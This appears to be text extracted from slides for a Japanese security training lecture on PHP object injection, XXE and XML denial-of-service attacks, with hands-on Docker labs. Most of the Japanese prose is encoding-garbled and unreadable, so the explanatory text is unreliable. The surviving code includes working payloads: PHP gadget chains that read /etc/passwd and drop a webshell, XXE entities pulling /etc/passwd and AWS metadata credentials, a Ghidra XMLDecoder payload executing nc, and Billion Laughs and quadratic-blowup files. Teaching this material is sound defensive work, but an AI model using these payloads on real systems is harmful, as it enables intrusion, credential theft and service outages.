1SPQFSUZ0SJFOUFE1SPHSBNNJOH Πϝʔδਤ Ϋϥε Ϋϥε Ϋϥε Ϋϥε ΨδΣοτ ΨδΣοτ ΨδΣοτ
ΨδΣοτ w ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ

1)1ಛ༗ͷςΫχοΫ class Example { private $obj; function __construct() {
// some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB w 1045ύϥϝʔλEBUB͸ VOTFSJBMJ[F ͞ΕΔ w ϚδοΫϝιου͸ &YBNQMFΫϥεʹ͋Δ w @@XBLFVQϝιουͰ͸ ม਺PCKͷFWBMVBUF Λ ࣮ߦ͢Δ w FWBM Λݺͼग़͢ $PEF4OJQQFUΫϥεͷ FWBMVBUF Λ࣮ߦ͍ͨ͠ʜ ࣮ߦ͍ͨ͠ʂʂʂ

1)1ಛ༗ͷςΫχοΫ w &YBNQMFΫϥεͷม਺PCK ʹ$PEF4OJQQFUΫϥεΛ ࢦఆ w $PEF4OJQQFUΫϥεͷ ม਺DPEFʹ࣮ߦͨ͠ ίʔυΛࢦఆ w
͜ͷΑ͏ͳಈ࡞Λ͢Δ γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛࢦఆͰ͖Ε ͹0, class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $PEF4OJQQFUΫϥεʹॻ͖׵͑Δ ࣮ߦ͍ͨ͠ίʔυΛ ೖྗ

1)1ಛ༗ͷςΫχοΫ w γϦΞϥΠζ͞ΕͨΦϒδ ΣΫτΛੜ੒͢Δ1)1ίʔ υΛॻ͖ɺ࣮ߦ͢Δͱ ߈ܸίʔυ͕ಘΒΕΔ <?php class CodeSnippet
{ private $code = "phpinfo();"; } class Example { private $obj; function __construct() { $this->obj = new CodeSnippet; } } echo serialize(new Example); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $ php pop-poc.php O:7:"Example":1:{s:12:"Exampleobj";O:11:"CodeSnippet":1: {s:17:"CodeSnippetcode";s:10:"phpinfo();";}}

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ w ࣮ࡍʹ1SPQFSUZ0SJFOUFE1SPHSBNNJOHΛ΍Δʹ͸γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛฤूͨ͘͠ͳΔ͜ͱ΋͋Δ w গ͚ͩ͠ฤू͍ͨ͠৔߹ɺίʔυ͔Βੜ੒͍ͯͯ͠͸໘౗ʜ w ਓྗͰಡΊΔΑ͏ʹͳ͓ͬͯ͘ͱϦΫΤετத͔ΒγϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛγϡοͱݟ͚ͭΒΕͯศརͳ͜ͱ΋͋Δ͔΋ʜ

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ <?php class Seccamp { private $year =
0; public function set_year($year){ $this->year = $year; } public function get_year(){ return $this->year; } } $object = new Seccamp(); $object->set_year(2021); echo serialize($object); w ࠨʹࣔ͢4FDDBNQΫϥεΛ ୊ࡐʹղઆ͍ͯ͘͠ w ϝϯόม਺ZFBSΛ࣋ͭ w TFU@ZFBSͱHFU@ZFBSͷͭ ͷϝιου͕͋Δ w TFU@ZFBSΛݺͼग़͠੔਺ Ληοτ͍ͯ͠Δ $ serialize-poc.php O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;}

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;} 0CKFDUΛࣔ͢0 จࣈ਺ Ϋϥε໊ ϓϩύςΟͷ਺ 4USJOHΛࣔ͢T จࣈ਺
จࣈྻ *OUFHFSΛࣔ͢J ਺஋

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζϑΥʔϚοτৄઆ w CPPMFBO w CWBMVF w JOUFHFS w JWBMVF
w EPVCMF w EWBMVF IUUQTJOTPNOJBTFDDPNEPXOMPBETQVCMJDBUJPOT1SBDUJDBM1)10CKFDU*OKFDUJPOQEG w /6-- w / w TUSJOH w TMFOHUIWBMVF w BSSBZ w BMFOHUI\LFZ WBMVFQBJST^

1SPQFSUZ0SJFOUFE1SPHSBNNJOH 301ʹࣅ͍ͯΔ w ίʔυͷஅยΛগ࣮ͣͭ͠ߦ͍͖ͯ͠ɺ࠷ऴతʹ໨ඪΛୡ੒͢Δͱ͜Ζ͕ 301ʹࣅ͍ͯΔ w όΠφϦʹର͢ΔFYQMPJUςΫχοΫͷߟ͑ํ͕8FCͷੈքʹԠ༻͞Ε͍ͯΔ Α͏Ͱɺ͓΋͠Ζ͍ʂʂ

ԋश0CKFDU*OKFDUJPOʢ෼ʣ w ࣍ͷίϚϯυΛೖྗ͢Δͱ%PDLFSίϯςφ্ཱ͕͕ͪΓ·͢ $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd
seccamp2021-b5 $ cd exercise/object-injection/ $ docker-compose build $ docker-compose up

w IUUQMPDBMIPTUΛϒϥ΢βͰ։͘͜ͱͰԋश؀ڥʹ ΞΫηεͰ͖·͢ ԋश0CKFDU*OKFDUJPOʢ෼ʣ

ԋशղઆ0CKFDU*OKFDUJPO w ߨ࣮ٛࢪ࣌ʹ͸Ξοϓϩʔυ͍ͯ͠ͳ͔ͬͨ-FWFMɺ-FWFMΛ ղͨ͘ΊͷεΫϦϓτ͸(JU)VCϦϙδτϦʹ্͛ͯ͋Γ·͢ʂ w IUUQTHJUIVCDPNULNSVTFDDBNQCUSFFNBTUFSFYFSDJTF PCKFDUJOKFDUJPOTPMWFS

ԋशղઆ-FWFM

ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛ @@XBLFVQϝιουͰಡΈऔ͍ͬͯΔ w PCKFDUύϥϝʔλͰγϦΞϥΠζ͞ΕͨΦϒδΣΫτΛड͚औΓ VOTFSJBMJ[F͍ͯ͠Δ w QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUFJOHΫϥεΛγϦΞϥΠζͨ͠΋ͷ ΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUDQBTTXE͕ಡΈऔΕͦ͏ʂʂ
ํ਑

ԋशղઆ-FWFM

ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛSFBEϝιουͰ ಡΈऔ͍ͬͯΔ w ͨͩ͠ɺ-FWFMͱҧͬͯ4FUUJOHΫϥε಺Ͱ͸ϚδοΫϝιου͕ͳ͍ʜ w .BJOΫϥεͰ͸ϚδοΫϝιου಺Ͱϝϯόม਺pMFͷSFBEϝιουΛ࣮ߦ͢Δ ͕pMFʹ͸OVMM͕ࢦఆ͞Ε͍ͯΔʜ w
QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUJOHΫϥεΛ.BJOΫϥεͷϝϯόม਺ pMFʹࢦఆ͠ɺγϦΞϥΠζͨ͠΋ͷΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUD QBTTXE͕ಡΈऔΕͦ͏ʂʂ ํ਑

ԋशղઆ-FWFM <?php class Setting { public $path = "config.json";
public function read() { $content = file_get_contents($this->path); echo $content; } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = "/etc/passwd"; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

ԋशղઆ-FWFM

ԋशղઆ-FWFM w େମ-FWFMͱಉ͕ͩ͡ɺ4FUUJOHΫϥε಺Ͱ͸TZTUFNؔ਺Λ࢖͍ͬͯΔ w ೚ҙίʔυ࣮ߦͷνϟϯεʂʂʂ w DBUΛ࣮ߦͨ͠ޙʹͰίϚϯυΛ۠੾ͬͯFDIPίϚϯυͰXFCTIFMMͱͯ͠ ಈ࡞͢ΔQIQϑΝΠϧΛॻ͖ࠐΈͰ͖Δ w DBUDPOpHKTPOFDIPa
QIQTZTUFN @(&5<DNE> aBQIQ w 1BUIʹˢ͕࣮ߦ͞ΕΔΑ͏ͳจࣈྻΛࢦఆ͢ΔͱΑͦ͞͏ʂʂʂ ํ਑

ԋशղઆ-FWFM <?php class Setting { public $path = "config.json";
public function read() { system("cat " . $this->path); } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php'; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

ԋशղઆ-FWFM

͜͜·Ͱͷ·ͱΊ w ༷ʑͳϓϩάϥϛϯάݴޠʹσγϦΞϥΠζγϦΞϥΠζͷ࢓૊Έ͕࣮૷͞ Ε͍ͯΔ w Ϣʔβ͕ࣗ༝ʹγϦΞϥΠζ͞ΕͨσʔλΛࢦఆͰ͖Δঢ়گ͸ةݥ w ϚδοΫϝιουΛ༻͍Ε͹༰қʹ3$&ʹ·Ͱ࣋ͪࠐΊΔ

ٳܜʢ෼ʣ

ୈ̏ষɿ 9.-ύʔαΛૂͬͨ߈ܸ

9.-ͷ༻్ 9.-ͱ͸ w 9.-ʢF9UFOTJCF.BSLVQ-BOHVBHFʣ͸ϚʔΫΞοϓݴޠͷͻͱͭ w ϚʔΫΞοϓݴޠςΩετϑΝΠϧͷதʹɺςΩετͱಛఆͷه߸Λ ૊Έ߹Θͤɺ෇Ճ৘ใΛهड़ͨ͠΋ͷɻ)5.-ͳͲ w ֤छઃఆϑΝΠϧͷϑΥʔϚοτʹͳ͍ͬͯΔ͜ͱ͕ଟ͍ w
"OESPJE.BOJGFTUYNMͳͲ

9.-ͷߏ଄ 9.-ͷྫ w λάͷೖΕࢠߏ଄Ͱσʔλ͕දݱ͞ΕΔ <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT
lectures (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> MFDUVSFTλάͷ಺༰Λఆٛ MFDUVSFTλάΛ࢖ͬͯ಺༰Λهࡌ

9.-ͷߏ଄ w ཁૉΛఆ͍ٛͯ͠ΔՕॴΛ%5%ʢ%PDVNFOU5ZQF%FpOJUJPOʣͱ͍͏ <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT lectures
(lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> 9.-ͷྫ MFDUVSFTλάΛ ఆٛ͢Δ%5%

9.-ͷߏ଄ w ྫʹ্͛ͨ9.-Ͱ͸MFDUVSFTλάͷߏ੒ཁૉɺଐੑΛఆ͍ٛͯͨ͠ w &OUJUZͱݺ͹ΕΔ໊લ෇͖ఆ਺ͷఆٛ΋Ͱ͖Δ %5%ʹΑͬͯఆٛ͞ΕΔ΋ͷ <?xml
version="1.0"?> <!DOCTYPE lectures[]> <?xml version="1.0"?> <!ENTITY title "झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ">

9.-ͷߏ଄ w ఆ਺Λද͢&OUJUZʹ͸*OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZͷ̎छྨ͕͋Δ w 4:45&.ΩʔϫʔυΛ༻͍ͯ63*εΩʔϜ͔Β஋ΛऔಘͰ͖Δ w 8FCϖʔδͷ63-΍ϩʔΧϧͷϑΝΠϧύεΛࢦఆͯ͠ ֎෦͔Β஋Λऔಘ͢Δͷ͕&YUFSOBM&OUJUZ *OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZ
<?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY xml-file SYSTEM "http://example.com/sample.xml"> <!ENTITY txt-file SYSTEM “file:///path/to/file.txt“> ]> <demo> <file>&xml-file</file> <file>&txt-file</file> </demo>

9.-FYUFSOBMFOUJUZJOKFDUJPO ֓ཁ w Ϣʔβ͕ࢦఆͨ͠9.-ϑΝΠϧΛॲཧ͢ΔΞϓϦέʔγϣϯ͕͋Δͱ͢Δ w &YUFSOBM&OUJUZΛ༻͍ͯϩʔΧϧͷϑΝΠϧɺ಺෦ωοτϫʔΫͷΞυϨε Λࢦఆͨ͠9.-ϑΝΠϧΛΞϓϦέʔγϣϯʹॲཧͤ͞Δ͜ͱͰ ຊདྷ͸Ϣʔβ͕஌Γಘͳ͍৘ใΛऔಘͰ͖Δ w ͜ͷ߈ܸख๏͸9.-&YUFSOBM&OUJUZʢ99&ʣJOKFDUJPOͱݺ͹ΕΔ
<?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY txt-file SYSTEM “file:///etc/passwd“> <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]>

9.-FYUFSOBMFOUJUZJOKFDUJPO 443'΁ͭͳ͛Δ w ݱ୅ͷ8FCΞϓϦέʔγϣϯ͸αʔό̍ͭͰಈ͍͍ͯΔ͜ͱ͸গͳ͘ɺ༷ʑ ͳαʔό͕૊Έ߹Θͬͯ͞ಈ͍͍ͯΔ w ຊདྷϢʔβ͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦৘ใʹΞΫηε͢Δ߈ܸ͕443' w ֎෦͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦ωοτϫʔΫ্ʹଘࡏ͍ͯ͠Δαʔό͕ ର৅ʹͳΔ

9.-FYUFSOBMFOUJUZJOKFDUJPO &$ͷNFUBEBUBͷऔಘ w "84&$Ͱ͸಺෦ΞυϨεʹΫϨσϯγϟϧΛอ͍࣋ͯ͠Δ w IUUQTMBUFTUNFUBEBUBJBNTFDVSJUZDSFEFOUJBMT w গ͠લ·Ͱɺ&YUFSOBM&OUJUZΛ্͔ͭͬͯهΞυϨεʹΞΫηε͢Δͱ FYUFSOBMFOUJUZJOKFDUJPO͔Β443'ʹൃలͤ͞ΒΕͨ
<?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]> <demo> &aws-metadata </demo>

9.-FYUFSOBMFOUJUZJOKFDUJPO *.%4WʹΑΔ&$ͷ؇࿨ࡦ w ݱ୅Ͱ΋&$্ͰʹΫϨσϯγϟϧ͸ଘࡏ͢Δ͕ ؆୯ʹ͸ΞΫηεͰ͖ͳ͍ w ࣄલʹ165ϦΫΤετͰऔಘͨ͠τʔΫϯ͕ඞਢʹͳͬͨ w 9.-ͷFOUJUZ͔Β͸165ϦΫΤετ͸ඈ͹ͤͳ͍ͨΊɺ FYUFSOBMFOUJUZJOKFDUJPO͔ΒΫϨσϯγϟϧΛऔಘ͢Δ͜ͱ͸Ͱ͖ͳ͍
w (PQIFSϓϩτίϧΛ࢖͑͹*.%4W͕༗ޮͰ΋ΫϨσϯγϟϧΛऔಘՄೳ͕ͩ 9.-ύʔαͱؔ܎ͳ͍࿩ʹͳͬͯ͠·͏ͷͰ͜͜Ͱ͸ׂѪ

9.-FYUFSOBMFOUJUZJOKFDUJPO ରࡦ w 9.-ϑΝΠϧ͸ػೳ͕๛෋Ͱѻ͍͕Ή͔͍ͣ͠ͷͰ+40/ϑΝΠϧͳͲͷ ଞͷϑΝΠϧϑΥʔϚοτΛࢦఆ͢Δ w 9.-ύʔα͕%5%Λॲཧ͠ͳ͍Α͏ʹػೳΛ੍ݶ͢Δ

(IJESBͰͷྫ ࣄલ՝୊̍ w (IJESBʹ͸99&ͷ੬ऑੑ͕ͭ͋Δʢ೥݄࣌఺ʣ w $7& w $7& w ࠶ݱ؀ڥΛ࡞੒ͯ͠ɺ࣮ࡍʹ੬ऑੑΛ߈ܸͯ͠΋Β͏՝୊Λग़͍ͯ͠·ͨ͠

$7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w ϓϩδΣΫτ৘ใΛอଘ͍ͯ͠ΔϓϩδΣΫτϑΝΠϧʢ HQSʣͷ಺෦ʹ 9.-ϑΝΠϧʢQSPKFDUQSQʣ͕ଘࡏ͢Δ w QSPKFDUQSQΛύʔε͢Δࡍʹ99&͕ՄೳͰ͋ͬͨ
ࣄલ՝୊ղઆ

$7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ ࣄલ՝୊ղઆ <?xml version="1.0" encoding=“UTF-8”?> <!DOCTYPE aaa
[ <!ENTITY % dtd SYSTEM “http://localhost:5000/xxe”> %dtd; ]> <FILE_INFO> <BASIC_INFO> <STATE NAME="OWNER" TYPE=“string” VALUE=“tkmru” /> </BASIC_INFO> </FILE_INFO>

$7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w (IJESBʹ͸σϑΥϧτͰ͸༗ޮʹͳ͍ͬͯͳ͍ɺ࣮ݧతͳػೳ͕ଘࡏ͢Δ w 9.-ϑΝΠϧʹهࡌ͞ΕͨύλʔϯͰόΠφϦ಺Λݕࡧ͢Δ 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹ੬ऑੑ͕ଘࡏͨ͠ ࣄલ՝୊ղઆ

$7& w $PEF#SPXTFSͷ'JMFϝχϡʔ͔Β$POpHVSFʜΛબ୒͢Δͱ $POpHVSF&YQFSJNFOUBM1MVHJOT΢Οϯυ΢͕։͔ΕΔ w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹνΣοΫΛ͍ΕΔͱର৅ػೳ͕ ༗ޮʹͳΔ ࣄલ՝୊ղઆ

$7& w 8JOEPX'VODUJPO#JU1BUUFSOT&YQMPSFSΑΓμΠΞϩάΛग़ͤΔ w 3FBE9.-'JMFTϘλϯΛΫϦοΫ͢Δ͜ͱͰ9.-ϑΝΠϧΛಡ·ͤΒΕΔ ࣄલ՝୊ղઆ

$7& w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹಡ·ͤΔ9.-ϑΝΠϧΛੜ੒͢Δ ඞཁ͕͋Δɻ w 4DSJQU.BOBHFS͔Β%VNQ'VODUJPO1BUUFSO*OGP4DSJQUΛ࣮ߦ͢Δͱ બ୒͍ͯ͠Δؔ਺ͷ๯಄ͷػցޠ΍ΞυϨεͳͲͷ৘ใΛهͨ͠9.-ϑΝΠ ϧ͕ग़ྗ͞ΕΔ w ग़ྗ͞Εͨ9.-Λฤूͯ͠ಡΈࠐΉ͜ͱͰ99&Λߦ͑Δ
ࣄલ՝୊ղઆ

$7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ ࣄલ՝୊ղઆ <?xml version="1.0" encoding="UTF-8"?> <java version="11.0.9"
class="java.beans.XMLDecoder"> <object class="ghidra.bitpatterns.info.FileBitPatternInfo"> <void property="ghidraURL"> <string>TODO: url</string> </void> <void property="languageID"> <string>x86:LE:64:default</string> </void> ʢলུʣ <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 5000</string> </void> </object> </java>

͜͜·Ͱ͸Α͘ղઆ͞Ε͍ͯΔ࿩ 9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏ w 99&͸̎ͭʹ෼ྨͰ͖Δ w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w 99&ͷଞʹ΋9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏͕͋Δ
w #JMMJPOMBVHITʢ&YQPOFOUJBMFOUJUZFYQBOTJPOʣ w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w %FDPNQSFTTJPO#PNCͳͲ

1ZUIPOΛ࢖ͬͯղઆ͠·͢ʂ w 1ZUIPOʹ͸9.-ύʔα͕ඪ४ϥΠϒϥϦͱͯ͠ଟ਺උΘ͍ͬͯΔ w ̍ͭͷݴޠͰෳ਺ͷ9.-ύʔαΛର৅ʹ؆୯ʹ1P$Λॻ͚ΔͨΊ ղઆʹ޲͍͍ͯΔ ଞͷ9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏

1ZUIPOͷஶ໊9.-ϥΠϒϥϦ 1ZUIPOެࣜαΠτهࡌͷඪ४ϥΠϒϥϦͨͪ IUUQTEPDTQZUIPOPSHMJCSBSZYNMIUNMYNMWVMOFSBCJMJUJFT ͖ͬ͞ղઆͨ͠99&

%FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

%FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ w 1ZUIPOͷஶ໊ͳ9.-ϥΠϒϥϦͷϥούʔ w ηΩϡΞʹ9.-Λѻ͏ػೳΛ෇Ճͯ͘͠ΕΔ w JNQPSUจΛࠩ͠ସ͑Δ͚ͩͰηΩϡΞʹͳͬͯศར 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

1ZUIPOͷஶ໊9.-ϥΠϒϥϦ %FGVTFEYNMͷ3&"%.&ʹ͸΋ͬͱৄ͍͠ද͕هࡌ͞Ε͍ͯΔ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM
w %FDPNQSFTTJPO#PNC ΠϚίί

#JMMJPO-BVHIT 9.-ʹΑΔ%P4߈ܸ w ΤϯςΟςΟΛ܁Γฦ͠ࢀরͤ͞Δ͜ͱʹΑͬͯ$16΁ͷෛՙɺϝϞϦফඅ ྔΛ্͛Δ%P4߈ܸ w αʔό΁େྔͷΞΫηεΛߦ͍ಈ࡞Λෆ҆ఆʹͤ͞Δͷ͕%P4߈ܸͩͱ ޡղ͞Ε͕ͪ w ΞϓϦέʔγϣϯͷಈ࡞͕ෆՄೳʹͳΔΑ͏ͳɺ
ҟৗʹಈ࡞ΛҾ͖ى͜͢ͷ͕%P4߈ܸͰ͋ͬͯखஈ͸ԿͰ΋ྑ͍ w 9.-CPNC΍FYQPOFOUJBMFOUJUZFYQBOTJPO߈ܸͱ΋ݺ͹ΕΔ

#JMMJPO-BVHIT 9.-ϑΝΠϧྫ w MPMʢMPUTPGMBVHITʣͱ͍͏ΠϯλʔωοτεϥϯάΛ༻͍ͨϑΝΠϧ͕༗໊ w ͦͷͨΊ#JMMJPO-BVHITͱ໊෇͚ΒΕ͍ͯΔ <?xml version="1.0"?> <!DOCTYPE
lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>

#JMMJPO-BVHIT ༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ #JMMJPO-BVHITΛࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞
$ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/billion-laughs $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

Өڹ͸ϥΠϒϥϦͦΕͧΕ w 9.-Λύʔε͢Δ࣮૷͕ͦΕͧΕҟͳΔͨΊӨڹ౓߹͍΋ҟͳΔ w FUSFFʹ͸࠷ߴʹࢗ͞Δʂ #JMMJPO-BVHITΛࢼ͢

2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w #JMMJPO-BVHITʹࣅ͍ͯΔ w ೖΕࢠʹͳͬͨ&OUJUZΛ࢖༻͢ΔͷͰ͸ͳ͘ɺ਺ઍจࣈͷจࣈྻΛද͢େ͖ͳ &OUJUZΛ܁Γฦ͠ෳ੡ͯ͠ϝϞϦফඅΛૂ͏ w ,#ఔ౓ͷ9.-ϑΝΠϧͰɺ.#͔Β਺(#ͷϝϞϦΛফඅͤ͞ΒΕΔ 9.-ʹΑΔ%P4߈ܸ

2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w ڊେͳจࣈྻʢ"""""""""""""""ʜʣ͕ೖͬͨΤϯςΟςΟʢYʣΛ ෳ਺ճݺͼग़͢͜ͱͰലେͳϝϞϦফඅΛૂ͏ w ࢦ਺ؔ਺తʹϝϞϦফඅྔ͕૿େ͢Δ#JMMJPO-BVHIT΄Ͳޮ཰తͰ͸ͳ͍ w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ͢Γൈ͚ΒΕΔ <?xml
version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)"> ]> <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(লུ)</DoS> 9.-ϑΝΠϧྫ

2VBESBUJD#MPXVQFOUJUZFYQBOTJPO 9.-ϑΝΠϧྫ w ڊେͳจࣈྻΛද͢ͷͰ9.-ϑΝΠϧͦͷ··Λจࣈྻͱͯ͠ѻ͏ΑΓ ίʔυதͰ9.-ϑΝΠϧΛ૊ΈཱͯΔ΄͏͕ѻ͍΍͍͢ size = 55000 entity
= 'A' * size refs = '&x;' * size data = '''\ <?xml version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "{entity}"> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs)

༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO

2VBESBUJDCMPXVQFOUJUZFYQBOTJPOΛࢼ͢ ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ 2VBESBUJDCMPXVQΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞
$ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/quadratic-blowup/ $ cd etree $ docker build . -t quadratic-blowup-etree $ docker run quadratic-blowup-etree

